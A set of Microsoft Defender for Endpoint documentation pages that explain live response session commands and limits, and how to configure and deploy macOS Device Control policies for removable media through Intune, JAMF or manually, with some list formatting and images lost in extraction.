- - **Windows Server 2016** - with [KB5005292](https://support.microsoft.com/topic/microsoft-defender-for-endpoint-update-for-edr-sensor-f8f69773-f17f-420f-91f4-a8e5167284ac)
- > [!NOTE]
- > For Windows Server 2012R2 or 2016 you must have the [Unified Agent](update-agent-mma-windows.md#update-mma-on-your-devices) installed, and it is recommended to patch to latest sensor version with KB5005292.
-
- - **Windows Server 2019**
- - Version 1903 or (with [KB4515384](https://support.microsoft.com/help/4515384/windows-10-update-kb4515384)) later
- - Version 1809 (with [KB4537818](https://support.microsoft.com/help/4537818/windows-10-update-kb4537818))
-
- - **Windows Server 2022**
--- **Enable live response from the advanced settings page**.-
- You need to enable the live response capability in the [Advanced features settings](advanced-features.md) page.
-
- > [!NOTE]
- > Only admins and users who have "Manage Portal Settings" permissions can enable live response.
--- **Enable live response for servers from the advanced settings page** (recommended).-
- > [!NOTE]
- > Only admins and users who have "Manage Portal Settings" permissions can enable live response.
--- **Enable live response unsigned script execution** (optional).-
- > [!IMPORTANT]
- > Signature verification only applies for PowerShell scripts.
-
- > [!WARNING]
- > Allowing the use of unsigned scripts may increase your exposure to threats.
-
- Running unsigned scripts isn't recommended as it can increase your exposure to threats. If you must use them however, you need to enable the setting in the [Advanced features settings](advanced-features.md) page.
--- **Ensure that you have the appropriate permissions**.-
- Only users who are provisioned with the appropriate permissions can initiate a session. For more information on role assignments, see [Create and manage roles](user-roles.md).
-
- > [!IMPORTANT]
- > The option to upload a file to the library is only available to users with "Manage Security Settings" permission.
- > The button is greyed out for users with only delegated permissions.
-
- Depending on the role that's been granted to you, you can run basic or advanced live response commands. Users permissions are controlled by RBAC custom role.
-
-## Live response dashboard overview
-
-When you initiate a live response session on a device, a dashboard opens. The dashboard provides information about the session such as the following:
--- Who created the session-- When the session started-- The duration of the session-
-The dashboard also gives you access to:
--- Disconnect session-- Upload files to the library-- Command console-- Command log-
-## Initiate a live response session on a device
-
-> [!NOTE]
-> Live response actions initiated from the Device page are not available in the machineactions API.
-
-1. Sign in to Microsoft Defender portal.
-
-2. Navigate to **Endpoints > Device inventory** and select a device to investigate. The devices page opens.
-
-3. Launch the live response session by selecting **Initiate live response session**. A command console is displayed. Wait while the session connects to the device.
-
-4. Use the built-in commands to do investigative work. For more information, see [Live response commands](#live-response-commands).
-
-5. After completing your investigation, select **Disconnect session**, then select **Confirm**.
-
-## Live response commands
-
-Depending on the role that's been granted to you, you can run basic or advanced live response commands. User permissions are controlled by RBAC custom roles. For more information on role assignments, see [Create and manage roles](user-roles.md).
-
-> [!NOTE]
-> Live response is a cloud-based interactive shell, as such, specific command experience may vary in response time depending on network quality and system load between the end user and the target device.
-
-### Basic commands
-
-The following commands are available for user roles that are granted the ability to run **basic** live response commands. For more information on role assignments, see [Create and manage roles](user-roles.md).
-
-| Command | Description | Windows and Windows Server | macOS | Linux |
-||||||
-| `cd` | Changes the current directory. | Y | Y | Y |
-| `cls` | Clears the console screen. | Y | Y | Y |
-| `connect` | Initiates a live response session to the device. | Y | Y | Y |
-| `connections` | Shows all the active connections. | Y | N | N |
-| `dir` | Shows a list of files and subdirectories in a directory. | Y | Y | Y |
-| `drivers` | Shows all drivers installed on the device. | Y | N | N |
-| `fg <command ID>` | Place the specified job in the foreground, making it the current job. Note that `fg` takes a `command ID` available from jobs, not a PID. | Y | Y | Y |
-| `fileinfo` | Get information about a file. | Y | Y | Y |
-| `findfile` | Locates files by a given name on the device. | Y | Y | Y |
-| `getfile <file_path>` | Downloads a file. | Y | Y | Y |
-| `help` | Provides help information for live response commands. | Y | Y | Y |
-| `jobs` | Shows currently running jobs, their ID and status. | Y | Y | Y |
-| `persistence` | Shows all known persistence methods on the device. | Y | N | N |
-| `processes` | Shows all processes running on the device. | Y | Y | Y |
-| `registry` | Shows registry values. | Y | N | N |
-| `scheduledtasks` | Shows all scheduled tasks on the device. | Y | N | N |
-| `services` | Shows all services on the device. | Y | N | N |
-| `startupfolders` | Shows all known files in startup folders on the device. | Y | N | N |
-| `status` | Shows the status and output of specific command. | Y | Y | Y |
-| `trace` | Sets the terminal's logging mode to debug. | Y | Y | Y |
-
-### Advanced commands
-
-The following commands are available for user roles that are granted the ability to run **advanced** live response commands. For more information on role assignments, see [Create and manage roles](user-roles.md).
-
-| Command | Description | Windows and Windows Server | macOS | Linux |
-||||||
-| `analyze` | Analyses the entity with various incrimination engines to reach a verdict. | Y | N | N |
-| `collect` | Collects forensics package from device. | N | Y | Y |
-| `isolate` | Disconnects the device from the network while retaining connectivity to the Defender for Endpoint service. | N | Y | N |
-| `release` | Releases a device from network isolation. | N | Y | N |
-| `run` | Runs a PowerShell script from the library on the device. | Y | Y | Y |
-| `library` | Lists files that were uploaded to the live response library. | Y | Y | Y |
-| `putfile` | Puts a file from the library to the device. Files are saved in a working folder and are deleted when the device restarts by default. | Y | Y | Y |
-| `remediate` | Remediates an entity on the device. The remediation action varies, depending on the entity type: <br/>- File: delete<br/>- Process: stop, delete image file<br/>- Service: stop, delete image file<br/>- Registry entry: delete<br/>- Scheduled task: remove<br/>- Startup folder item: delete file<br/><br/>This command has a prerequisite command. You can use the `-auto` command in conjunction with remediate to automatically run the prerequisite command. | Y | Y | Y |
-| `scan` | Runs a quick antivirus scan to help identify and remediate malware. | N | Y | Y |
-| `undo` | Restores an entity that was remediated. | Y | N | N |
-
-## Use live response commands
-
-The commands that you can use in the console follow similar principles as [Windows Commands](/windows-server/administration/windows-commands/windows-commands#BKMK_c).
-
-The advanced commands offer a more robust set of actions that allow you to take more powerful actions such as download and upload a file, run scripts on the device, and take remediation actions on an entity.
-
-### Get a file from the device
-
-For scenarios when you'd like get a file from a device you're investigating, you can use the `getfile` command. This allows you to save the file from the device for further investigation.
-
-> [!NOTE]
-> The following file size limits apply:
->
-> - `getfile` limit: 3 GB
-> - `fileinfo` limit: 30 GB
-> - `library` limit: 250 MB
-
-### Download a file in the background
-
-To enable your security operations team to continue investigating an impacted device, files can now be downloaded in the background.
--- To download a file in the background, in the live response command console, type `download <file_path> &`.-- If you are waiting for a file to be downloaded, you can move it to the background by using Ctrl + Z.-- To bring a file download to the foreground, in the live response command console, type `fg <command_id>`.-
-Here are some examples:
-
-|Command|What it does|
-|||
-|`getfile "C:\windows\some_file.exe" &`|Starts downloading a file named *some_file.exe* in the background.|
-|`fg 1234`|Returns a download with command ID *1234* to the foreground.|
-|
-
-### Put a file in the library
-
-Live response has a library where you can put files into. The library stores files (such as scripts) that can be run in a live response session at the tenant level.
-
-Live response allows PowerShell scripts to run, however you must first put the files into the library before you can run them.
-
-You can have a collection of PowerShell scripts that can run on devices that you initiate live response sessions with.
-
-#### To upload a file in the library
-
-1. Click **Upload file to library**.
-
-2. Click **Browse** and select the file.
-
-3. Provide a brief description.
-
-4. Specify if you'd like to overwrite a file with the same name.
-
-5. If you'd like to be, know what parameters are needed for the script, select the script parameters check box. In the text field, enter an example and a description.
-
-6. Click **Confirm**.
-
-7. (Optional) To verify that the file was uploaded to the library, run the `library` command.
-
-### Cancel a command
-
-Anytime during a session, you can cancel a command by pressing CTRL + C.
-
-> [!WARNING]
-> Using this shortcut will not stop the command in the agent side. It will only cancel the command in the portal. So, changing operations such as "remediate" may continue, while the command is canceled.
-
-## Run a script
-
-Before you can run a PowerShell/Bash script, you must first upload it to the library.
-
-After uploading the script to the library, use the `run` command to run the script.
-
-If you plan to use an unsigned PowerShell script in the session, you'll need to enable the setting in the [Advanced features settings](advanced-features.md) page.
-
-> [!WARNING]
-> Allowing the use of unsigned scripts may increase your exposure to threats.
-
-## Apply command parameters
--- View the console help to learn about command parameters. To learn about an individual command, run:-
- ```powershell
- help <command name>
- ```
--- When applying parameters to commands, note that parameters are handled based on a fixed order:-
- ```powershell
- <command name> param1 param2
- ```
--- When specifying parameters outside of the fixed order, specify the name of the parameter with a hyphen before providing the value:-
- ```powershell
- <command name> -param2_name param2
- ```
--- When using commands that have prerequisite commands, you can use flags:-
- ```powershell
- <command name> -type file -id <file path> - auto
- ```
-
- or
-
- ```powershell
- remediate file <file path> - auto`
- ```
-
-## Supported output types
-
-Live response supports table and JSON format output types. For each command, there's a default output behavior. You can modify the output in your preferred output format using the following commands:
--- `-output json`-- `-output table`-
-> [!NOTE]
-> Fewer fields are shown in table format due to the limited space. To see more details in the output, you can use the JSON output command so that more details are shown.
-
-## Supported output pipes
-
-Live response supports output piping to CLI and file. CLI is the default output behavior. You can pipe the output to a file using the following command: [command] > [filename].txt.
-
-Example:
-
-```console
-processes > output.txt
-```
-
-## View the command log
-
-Select the **Command log** tab to see the commands used on the device during a session. Each command is tracked with full details such as:
--- ID-- Command line-- Duration-- Status and input or output side bar-
-## Limitations
--- Live response sessions are limited to 25 live response sessions at a time.-- Live response session inactive timeout value is 30 minutes.-- Individual live response commands have a time limit of 10 minutes, with the exception of `getfile`, `findfile`, and `run`, which have a limit of 30 minutes.-- A user can initiate up to 10 concurrent sessions.-- A device can only be in one session at a time.-- The following file size limits apply:
- - `getfile` limit: 3 GB
- - `fileinfo` limit: 30 GB
- - `library` limit: 250 MB
-
-## Related article
--- [Live response command examples](live-response-command-examples.md)-
security Mac Device Control Faq https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-device-control-faq.md
- Title: macOS Device control policies frequently asked questions (FAQ)
-description: Get answers to common questions about device control policies using JAMF or Intune.
------- m365-security-- tier3-- mde-macos-- Previously updated : 03/31/2023--
-# macOS Device Control policies frequently asked questions (FAQ)
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Business](/microsoft-365/security/defender-business)--
-This article provides answers to frequently asked questions about Device Control capabilities in Microsoft Defender for Endpoint.
-
-## Questions | Answers
-
-### How do I know whether the machine is Device Control enabled, and what is the Default Enforcement?
-
-Answer: Run _mdatp device-control policy preferences list_ to see all the iOS policies on this machine:
--
-### How do I know whether the policy has been delivered to the client machine?
-
-Answer: Run _mdatp device-control policy rules list_ to see all the iOS policies on this machine:
--
-Answer 2: Run _mdatp device-control policy groups list_ to see all the iOS groups on this machine:
--
-## See also
--- [Device Control for macOS](mac-device-control-overview.md)-- [Deploy and manage Device Control using Intune](mac-device-control-intune.md)-- [Deploy and manage Device Control using jamf](mac-device-control-jamf.md)
security Mac Device Control Intune https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-device-control-intune.md
- Title: Deploy and manage Device Control using Intune
-description: Learn how to deploy and manage device control policies using Intune.
------- m365-security-- tier3-- mde-macos-- Previously updated : 03/31/2023--
-# Deploy and manage Device Control using Intune
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Business](/microsoft-365/security/defender-business)--
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-Microsoft Defender for Endpoint Device Control feature enables you to audit, allow, or prevent the read, write, or execute access to removable storage, and allows you to manage iOS and Portable device and Bluetooth media with or without exclusions.
-
-## Licensing requirements
-
-Before you get started with Removable Storage Access Control, you must confirm your [Microsoft 365 subscription](https://www.microsoft.com/microsoft-365/compare-microsoft-365-enterprise-plans?rtc=3). To access and use Removable Storage Access Control, you must have Microsoft 365 E3.
-
-## Deploy policy by using Intune
-
-### Step 1: Build mobileconfig file
-
-Now, you have `groups`, `rules`, and `settings`, replace the mobileconfig file with those values and put it under the Device Control node. Here's the demo file: [mdatp-devicecontrol/demo.mobileconfig at main - microsoft/mdatp-devicecontrol (github.com)](https://github.com/microsoft/mdatp-devicecontrol/blob/main/macOS/mobileconfig/demo.mobileconfig). Make sure validate your policy with the JSON schema and make sure your policy format is correct: [mdatp-devicecontrol/device_control_policy_schema.json at main - microsoft/mdatp-devicecontrol (github.com)](https://github.com/microsoft/mdatp-devicecontrol/blob/main/macOS/policy/device_control_policy_schema.json).
-
-> [!NOTE]
-> See [Device Control for macOS](mac-device-control-overview.md) for information about settings, rules and groups.
-
-### Deploy the mobileconfig file using Intune
-
-You can deploy the mobileconfig file through [**https://endpoint.microsoft.com/**](https://endpoint.microsoft.com/) > **Devices** > **macOS**:
--- select 'Create profile'-- select 'Templates' and 'Custom'--
-## See also
--- [Device Control for macOS](mac-device-control-overview.md)-- [Deploy and manage Device Control using jamf](mac-device-control-jamf.md)-- [macOS Device Control frequently asked questions (FAQ)](mac-device-control-faq.md)-
security Mac Device Control Jamf https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-device-control-jamf.md
- Title: Deploy and manage device control using JAMF
-description: Learn how to use device control policies using JAMF.
------- m365-security-- tier3-- mde-macos-- Previously updated : 03/31/2023--
-# Deploy and manage Device Control using JAMF
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Business](/microsoft-365/security/defender-business)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-Microsoft Defender for Endpoint Device Control feature enables you to audit, allow, or prevent the read, write, or execute access to removable storage, and allows you to manage iOS and Portable device and Bluetooth media with or without exclusions.
-
-## Licensing requirements
-
-Before you get started with Removable Storage Access Control, you must confirm your [Microsoft 365 subscription](https://www.microsoft.com/microsoft-365/compare-microsoft-365-enterprise-plans?rtc=3). To access and use Removable Storage Access Control, you must have Microsoft 365 E3.
--
-## Deploy policy by using JAMF
-
-### Step 1: Create policy JSON
-
-Now, you have 'groups' and 'rules' and 'settings', combine 'settings' and 'groups' and rules into one JSON, here is the demo file: [https://github.com/microsoft/mdatp-devicecontrol/blob/main/macOS/policy/samples/deny_removable_media_except_kingston.json](https://github.com/microsoft/mdatp-devicecontrol/blob/main/macOS/policy/samples/deny_removable_media_except_kingston.json). Make sure to validate your policy with the JSON schema so your policy format is correct: [https://github.com/microsoft/mdatp-devicecontrol/blob/main/macOS/policy/device_control_policy_schema.json](https://github.com/microsoft/mdatp-devicecontrol/blob/main/macOS/policy/device_control_policy_schema.json).
-
-See [Device Control for macOS](mac-device-control-overview.md) for information about settings, rules and groups.
-
-### Step 2: Update MDE Preferences Schema
-
-The [MDE Preferences schema](https://github.com/microsoft/mdatp-xplat/blob/master/macos/schemE Preferences configuration profile should be updated to use the new schema file's content.
--
-### Step 3: Add Device Control Policy to MDE Preferences
-
-A new 'Device Control' property will now be available to add to the UX.
-
-1. Select the topmost **Add/Remove properties** button, then select **Device Control** and press **Apply**.
--
-2. Next, scroll down until you see the **Device Control** property (it will be the bottommost entry), and select **Add/Remove properties** directly underneath it.
-
-3. Select **Device Control Policy**, and then click **Apply**.
--
-4. To finish, copy and paste the Device Control policy JSON into the text box, and save your changes to the configuration profile.
--
-## See also
--- [Device Control for macOS](mac-device-control-overview.md)-- [Deploy and manage Device Control using Intune](mac-device-control-intune.md)-- [macOS Device Control frequently asked questions (FAQ)](mac-device-control-faq.md)
security Mac Device Control Manual https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-device-control-manual.md
- Title: Deploy and manage device control manually
-description: Learn how to use device control policies manually.
------- m365-security-- tier3-- mde-macos-- Previously updated : 03/31/2023--
-# Deploy and manage Device Control manually
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Business](/microsoft-365/security/defender-business)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-Microsoft Defender for Endpoint Device Control feature enables you to audit, allow, or prevent the read, write, or execute access to removable storage, and allows you to manage iOS and Portable device and Bluetooth media with or without exclusions.
-
-## Licensing requirements
-
-Before you get started with Removable Storage Access Control, you must confirm your [Microsoft 365 subscription](https://www.microsoft.com/microsoft-365/compare-microsoft-365-enterprise-plans?rtc=3). To access and use Removable Storage Access Control, you must have Microsoft 365 E3.
--
-## Deploy policy manually
-
-This method is recommended for preproduction environments only. It's available starting with version 101.23082.0018.
-You can create a policy JSON and try it on a single machine before deploying it via MDM to all users.
-Microsoft recommends using MDM for production environment.
-
-You can set a policy manually, only if it wasn't set via MDM (as a managed configuration).
-
-### Step 1: Create policy JSON
-
-Now, you have `groups`, `rules`, `settings`, combine them into one JSON. Here's the demo file: [mdatp-devicecontrol/deny_removable_media_except_kingston.json at main - microsoft/mdatp-devicecontrol (github.com)](https://github.com/microsoft/mdatp-devicecontrol/blob/main/macOS/policy/samples/deny_removable_media_except_kingston.md). Make sure to validate your policy with the JSON schema so your policy format is correct: [mdatp-devicecontrol/device_control_policy_schema.json at main - microsoft/mdatp-devicecontrol (github.com)](https://github.com/microsoft/mdatp-devicecontrol/blob/main/macOS/policy/device_control_policy_schema.json).
-
-See [Device Control for macOS](mac-device-control-overview.md) for information about settings, rules, and groups.
-
-### Step 2: Apply policy
-
-Use `mdatp config device-control policy set --path <full-path-to-policy.json>` to apply the policy.
-You can now try protected operations, or use usual `mdatp device-control` commands to inspect the effective policy.
-
-```sh
-> mdatp device-control policy preferences list
-.Preferences
-|-o UX
-| |-o Navigation Target: "https://www.microsoft.com"
-|-o Features
-| |-o Removable Media
-| |-o Disable: false
-|-o Global
- |-o Default Enforcement: "allow"
-
-```
-
-You can edit your policy file, reapply it, and see changes immediately.
-
-### Step 3: Undo your changes
-
-To clear the policy, use `mdatp config device-control policy reset`.
-
-## See also
--- [Device Control for macOS](mac-device-control-overview.md)-- [Deploy and manage Device Control using Intune](mac-device-control-intune.md)-- [Deploy and manage Device Control using JAMF](mac-device-control-jamf.md)-- [macOS Device Control frequently asked questions (FAQ)](mac-device-control-faq.md)
security Mac Device Control Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/mac-device-control-overview.md
- Title: Device control for macOS
-description: Learn how to configure Microsoft Defender for Endpoint on Mac to reduce threats from removable storage such as USB devices.
------- m365-security-- tier3-- mde-macos-- Previously updated : 04/03/2023--
-# Device Control for macOS
--
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- [Microsoft Defender for Business](/microsoft-365/security/defender-business)-
-> Want to experience Microsoft Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-exposedapis-abovefoldlink)
-
-## Requirements
-
-Device Control for macOS has the following prerequisites:
-
-> [!div class="checklist"]
->
-> - Microsoft Defender for Endpoint entitlement (can be trial)
-> - Minimum OS version: macOS 11 or higher
-> - Minimum product version: 101.34.20
-
-## Overview
-
-Microsoft Defender for Endpoint Device Control feature enables you to:
--- Audit, allow, or prevent the read, write, or execute access to removable storage; and -- Manage iOS and Portable devices, and Apple APFS encrypted devices and Bluetooth media, with or without exclusions.-
-## Prepare your endpoints
--- Microsoft Defender for Endpoint entitlement (can be trial)-- Minimum OS version: macOS 11 or higher-- Deploy Full Disk Access: you may already have previously created and deployed this [https://github.com/microsoft/mdatp-xplat/blob/master/macos/mobileconfig/profiles/fulldisk.mobileconfig](https://github.com/microsoft/mdatp-xplat/blob/master/macos/mobileconfig/profiles/fulldisk.mobileconfig) for other MDE features. You need to grant Full Disk Access permission for a new application: `com.microsoft.dlp.daemon`.-- Enable Device Control on the MDE Preference setting:-
- Data Loss Prevention (DLP)/Features/
-
- For **Feature Name**, enter "DC_in_dlp"
-
- For **State**, enter "enabled"
-
-Example 1: JAMF using [schema.json](https://github.com/microsoft/mdatp-xplat/tree/master/macos/schema)
--
-<details><summary>Example 2: [demo.mobileconfig](https://github.com/microsoft/mdatp-devicecontrol/blob/main/Removable%20Storage%20Access%20Control%20Samples/macOS/mobileconfig/demo.mobileconfig)</summary>
-
-```xml
- <key>dlp</key>
- <dict>
- <key>features</key>
- <array>
- <dict>
- <key>name</key>
- <string>DC_in_dlp</string>
- <key>state</key>
- <string>enabled</string>
- </dict>
- </array>
- </dict>
-```
-</details>
--- Minimum product version: 101.91.92 or higher-- Run _mdatp version_ through Terminal to see the product version on your client machine:-
- :::image type="content" source="mediatp-version-terminal.png ":::
-
-## Understanding policies
-
-Policies determine the behavior of device control for macOS. The policy is targeted via Intune or JAMF to a collection of machines or users.
-
-The Device Control for macOS policy includes settings, groups, and rules:
--- Global setting called 'settings' allows you to define the global environment.-- Group called 'groups' allows you to create media groups. For example, authorized USB group or encrypted USB group.-- Access policy rule called 'rules' allows you to create policy to restrict each group. For example, only allow authorized user to Write access-authorized USB group.---
-> [!NOTE]
-> We recommend you use the examples on the GitHub to understand the properties: [mdatp-devicecontrol/Removable Storage Access Control Samples/macOS/policy at main - microsoft/mdatp-devicecontrol (github.com)](https://github.com/microsoft/mdatp-devicecontrol/tree/main/Removable%20Storage%20Access%20Control%20Samples/macOS/policy).
->
-> You can also use the scripts at [mdatp-devicecontrol/tree/main/python#readme at main - microsoft/mdatp-devicecontrol (github.com)](https://github.com/microsoft/mdatp-devicecontrol/tree/main/python#readme) to translate Windows Device Control policy to macOS Device Control policy or translate macOS Device Control V1 policy to this V2 policy.
-
-> [!NOTE]
-> There are [known issues](#known-issues) with device control for macOS that customers should consider when creating policies.
-
-### Best practices
-
-Device control for macOS has similar capabilities to Device control for Windows, but macOS and Windows provide different underlying capabilities to manage devices, so there are some important differences:
--- macOS doesn't have a centralized Device Manager or view of devices. Access is granted/denied to applications that interact with devices. This is why on macOS there are a richer set of [access types](#access-types). For example on a ```portableDevice``` device control for macOS can deny or allow ```download_photos_from_device```.-- To stay consistent with Windows, there are ```generic_read```,```generic_write``` and ```generic_execute``` access types. Policies with generic access types don't need to be changed if/when additional specific access types are added in the future. The best practice is to use generic access types unless there's a specific need to deny/allow a more specific operation.-- Creating a ```deny``` policy using generic access types is the best way to attempt to completely block all operations for that type of device (e.g. Android phones), but there may still be gaps if the operation is performed using an application that isn't supported by macOS device control. --
-### Settings
-Here are the properties you can use when you create the groups, rules, and settings in device control policy for macOS.
-
-| Property name | Description | Options |
-|:|:|:|
-| features | Feature specific configurations | You can set `disable` to false or true for following features: <br/>- `removableMedia`<br/>- `appleDevice`<br/>- `portableDevice`, including camera or PTP media<br/>- `bluetoothDevice`<br/><br/>The default is `true`, so if you don't configure this value, it will not apply even if you create a custom policy for `removableMedia`, because it's disabled by default. |
-| global | Set default enforcement | You can set `defaultEnforcement` to<br/>- `allow` (_default_)<br/>- `deny` |
-| ux | You can set a hyperlink on notification. | `navigationTarget: string`. Example: `"http://www.microsoft.com"` |
-
-### Group
-
-| Property name | Description | Options |
-|:|:|:|
-| `$type` | The kind of group | "device" |
-| `id` | GUID, a unique ID, represents the group and will be used in the policy. | You can generate the ID through [New-Guid (Microsoft.PowerShell.Utility) - PowerShell](/powershell/module/microsoft.powershell.utility/new-guid?view=powershell-7.2&preserve-view=true) or the uuidgen command on macOS |
-| `name` | Friendly name for the group. | string |
-| `query` | The media coverage under this group | See the **query** properties tables below for details. |
-
-### Query
-
-Device Control supports two kinds of queries:
-
-Query type 1 is as follows:
-
-| Property name | Description | Options |
-|:|:|:|
-| `$type` | Identify the logical operation to perform on the clauses | **all**: Any attributes under the **clauses** are an _And_ relationship. For example, if the administrator puts `vendorId` and `serialNumber`, for every connected USB, the system checks to see whether the USB meets both values.<br> **and**: is equivalent to _all_ <br> **any:** The attributes under the **clauses** are _Or_ relationship. For example, if administrator puts `vendorId` and `serialNumber`, for every connected USB, system does the enforcement as long as the USB has either an identical `vendorId` or `serialNumber` value. <br> **or**: is equivalent to _any_ |
-| `clauses` | Use media device property to set group condition. | An array of clause objects that are evaluated to determine group membership. See the [Clause](#clause) section below. |
-
-Query type 2 is as follows:
-
-| Property name | Description | Options |
-|:|:|:|
-| `$type` | Identify the logical operation to perform on the subquery | not: logical negation of a query |
-| `query` | A subquery | **A query which will be negated.** |
-
-### Clause
-
-#### Clause properties
-
-| Property name | Description | Options |
-|:|:|:|
-| `$type` | The type of clause | See the following table for supported clauses. |
-| `value` | $type specific value to use | |
-
-#### Supported clauses
-
-| clause $type | value | Description |
-|:|:|:|
-| `primaryId` | One of: <br>- `apple_devices`<br>- `removable_media_devices` <br>- `portable_devices` <br>- `bluetooth_devices` | |
-| `vendorId` | 4 digit hexadecimal string | Matches a device's vendor ID |
-| `productId` | 4 digit hexadecimal string | Matches a device's product ID |
-| `serialNumber` | string | Matches a device's serial number. Doesn't match if the device doesn't have a serial number. |
-| `encryption` | apfs | Match if a device is apfs-encrypted. |
-| `groupId` | UUID string | Match if a device is a member of another group. The value represents the UUID of the group to match against. <br> The group must be defined within the policy prior to the clause. |
-
-### Access policy rule
-
-| Property name | Description | Options |
-|:|:|:|
-| `id` | GUID, a unique ID, represents the rule and will be used in the policy. | New-Guid (Microsoft.PowerShell.Utility) - PowerShell <br> uuidgen |
-| `name` | String, the name of the policy and will display on the toast based on the policy setting. | |
-| `includeGroups` | The group(s) that the policy will be applied to. If multiple groups are specified, the policy applies to any media in all those groups. If not specified, the rule applies to all devices. | The **id** value inside the group must be used in this instance. If multiple groups are in the `includeGroups`, it's _AND_. <br/> `"includeGroups": ["3f082cd3-f701-4c21-9a6a-ed115c28e217"]` |
-| `excludeGroups` | The group(s) that the policy doesn't apply to. | The **id** value inside the group must be used in this instance. If multiple groups are in the excludeGroups, it's _OR_. |
-| `entries` | One rule can have multiple entries; each entry with a unique GUID tells Device Control one restriction.| See entry properties table later in this article to get the details. |
-
-The following table lists the properties you can use in your entry:
-
-| Property name | Description | Options |
-|:|:|:|
-| `$type` | | Includes: <br/>- `removableMedia`<br/>- `appleDevice`<br/>- `PortableDevice`<br/>- `bluetoothDevice`<br/>- `generic` |
-| enforcement | | - `$type`:<br/>- `allow`<br/>- `deny`<br/>- `auditAllow`<br/>- `auditDeny`<br/><br/>**When $type allow is selected, options value supports:** <br/>- `disable_audit_allow`<br/> Even if **Allow** happens and the **auditAllow** is setting configured, the system won't send event.<br/><br/>**When $type deny is selected, options value supports:** <br/>`disable_audit_deny`<br/>Even if **Block** happens and the **auditDeny** is setting configured, the system won't show notification or send event.<br/><br/>**When $type auditAllow is selected, options value supports:** <br/>`send_event`<br/><br/>**When $type auditDeny is selected, options value supports:** <br/>`send_event`<br/>`show_notification` |
-| `access`| |Specify one or more access rights for this rule. These may include either device specific granular permissions, or broader generic permissions. See table below for more details on the valid access types for a given entry $type. |
-| `id`| UUID| |
-
-The following table lists the properties you can use in entry:
-
-### Enforcement
-
-#### Enforcement property name
-
-| Property name | Description | Options |
-|:|:|:|
-| `$type` | The type of enforcement | See table below for supported enforcements |
-| `options` | $type specific value to use | An array of options for the entry. May be omitted if not options are desired. |
-
-#### Enforcement type
-
-| Property name | Description | Options |
-|:|:|:|
-|`Enforcement $type` | `options` values [string] | Description |
-| `allow` | `disable_audit_allow` | Even if **Allow** happens and the **auditAllow** is setting configured, the system won't send event. |
-| `deny` | `disable_audit_deny` | Even if **Block** happens and the auditDeny is setting configured, the system won't show notification or send event. |
-| `auditAllow` | `send_event` | Send telemetry |
-| `auditDeny` | - `send_event`<br/>- `show_notification` | - Send telemetry<br/>- Display Block UX to user |
-
-### Access types
-
-|entry $type | 'access' values [string] | Generic Access | Description |
-|:|:|:|:|
-| **appleDevice** | backup_device | generic_read | |
-| appleDevice | update_device | generic_write | |
-| appleDevice | download_photos_from_device | generic_read | download photo from the specific iOS device to local machine |
-| appleDevice | download_files_from_device | generic_read | download file(s) from the specific iOS device to local machine |
-| appleDevice | sync_content_to_device | generic_write | sync content from local machine to specific iOS device |
-| **portableDevice**| download_files_from_device | generic_read | |
-| portableDevice | send_files_to_device | generic_write | |
-| portableDevice | download_photos_from_device | generic_read | |
-| portableDevice | debug | generic_execute | ADB tool control |
-| ***removableMedia**| read | generic_read | |
-| removableMedia | write | generic_write | |
-| removableMedia | execute | generic_execute | generic_read |
-| **bluetoothDevice** | download_files_from_device | | |
-| bluetoothDevice | send_files_to_device | generic_write | |
-| **generic** | generic_read | | Equivalent to setting all access values denoted in this table that map to generic_read. |
-| generic | generic_write | | Equivalent to setting all access values denoted in this table that map to generic_write. |
-| generic | generic_execute | | Equivalent to setting all access values denoted in this table that map to generic_execute. |
-
